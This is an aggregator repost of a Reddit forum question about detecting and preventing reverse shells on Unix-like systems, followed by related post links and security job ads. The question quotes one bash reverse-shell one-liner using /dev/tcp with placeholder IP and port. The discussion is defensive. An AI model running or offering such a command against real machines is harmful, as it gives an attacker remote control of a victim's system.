all InfoSec news logo
all InfoSec news - Your InfoSec news aggregator
Log in Sign up
all InfoSec news

Detecting reverse shells on Unix-like systems

Add to bookmarks
June 12, 2022, 9:16 a.m. | /u/gruvboxer

cybersecurity www.reddit.com

I've been fiddling with TCP reverse shells **for Unix-like systems**.
e.g.

bash -i >& /dev/tcp/<ip>/<port> 0>&1

I've extended this to keep it alive and run in the background, which has greatly raised my interest and concerns.

I'd like to open discussion around:

\- how reverse shells are typically concealed

\- how we can detect this kind of activity on already compromised machines

\- what can be done to prevent these from succeeding when an authenticated user plants one

cybersecurity reverse systems unix

Visit resource

More from www.reddit.com / cybersecurity

Update on previous post “best security practices in gaming development” 5 hours ago | www.reddit.com
can ciso cybersecurity engine +10
Should I be learning Cybersecurity on my primary machine? 15 hours ago | www.reddit.com
accounting auditor cybersecurity free +7
QSA Says we Can't Provide Public WiFi 16 hours ago | www.reddit.com
campus can cybersecurity event +13
Chinese Government Poses 'Bold and Unrelenting' Threat to U.S. Critical Infrastructure, FBI Director Says | … 17 hours ago | www.reddit.com
bureau chinese chinese government critical +10
What is best practice to prevent man in the middle compromising emails? 19 hours ago | www.reddit.com
attack best practice caught cybersecurity +13
High School English Teacher to Cybersecurity Engineer - A How-to Guide 19 hours ago | www.reddit.com
cybersecurity engineer guide high +16
Just me, or is every vendor's website awful. WHAT DO YOU ACTUALLY DO? 20 hours ago | www.reddit.com
article customers cybersecurity edr +17
We have Crowdstrike for our EDR. Can we use it as our primary SIEM? 21 hours ago | www.reddit.com
can cons cost crowdstrike +13
Web API Security Champion: Broken Object Level Authorization (OWASP TOP 10) 21 hours ago | www.reddit.com
api api security authorization broken object level authorization +9

Jobs in InfoSec / Cybersecurity

Post a job on infosec-jobs.com Find talent on infosec-jobs.com

SOC 2 Manager, Audit and Certification

@ Deloitte | US and CA Multiple Locations
View on infosec-jobs.com

Information Security Engineers

@ D. E. Shaw Research | New York City
View on infosec-jobs.com

Security Engineer, Incident Response

@ Databricks | Remote - Netherlands
View on infosec-jobs.com

Associate Vulnerability Engineer - Mid-Atlantic region (Part-Time)

@ GuidePoint Security LLC | Remote in VA, MD, PA, NC, DE, NJ, or DC
View on infosec-jobs.com

Data Security Architect

@ Accenture Federal Services | Washington, DC
View on infosec-jobs.com

Identity Security Administrator

@ SailPoint | Pune, India
View on infosec-jobs.com
View more jobs